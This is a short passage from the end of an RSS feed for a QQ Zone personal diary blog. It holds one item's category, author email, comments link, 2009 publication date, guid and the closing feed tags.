<category><![CDATA[个人日记]]></category>
<author><![CDATA[769626132@qq.com(津津精品)]]></author>
<comments>http://769626132.qzone.qq.com/blog/1258466635#comment</comments>
<qz:effect>134218241</qz:effect>
<pubDate>Tue, 17 Nov 2009 14:03:55 GMT</pubDate>
<guid>http://769626132.qzone.qq.com/blog/1258466635</guid>
</item>

</channel>
</rss>

